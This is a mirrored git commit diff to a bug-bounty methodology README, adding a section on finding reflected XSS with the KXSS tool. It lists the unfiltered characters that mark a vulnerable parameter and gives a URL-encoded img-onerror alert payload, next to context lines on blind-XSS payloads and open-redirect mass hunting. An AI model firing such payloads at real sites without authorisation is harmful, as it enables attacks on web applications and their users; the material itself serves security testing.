mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-10 06:04:20 +00:00
GITBOOK-55: change request with no subject merged in GitBook
This commit is contained in:
parent
aedb40ca27
commit
108a5d42cc
1 changed files with 10 additions and 0 deletions
10
README.md
10
README.md
|
@ -65,6 +65,16 @@ cat urls.txt --> read the file
|
|||
-b xalgord.xss.ht --> BXSS payload adder.
|
||||
```
|
||||
|
||||
### KXSS
|
||||
|
||||
The vulnerable parameter for XSS should have Unfiltered : **\[“ ‘ < > $ | ( ) \` : ; { } ]**
|
||||
|
||||
**Payload:** 
|
||||
|
||||
```
|
||||
"><img%20src=x%20onerror="alert(%27POC%20By%20Xalgord%27)"
|
||||
```
|
||||
|
||||
### Open Redirect Mass Hunt
|
||||
|
||||
* tool = ragno, qsreplace
|
||||
|
|
Loading…
Reference in a new issue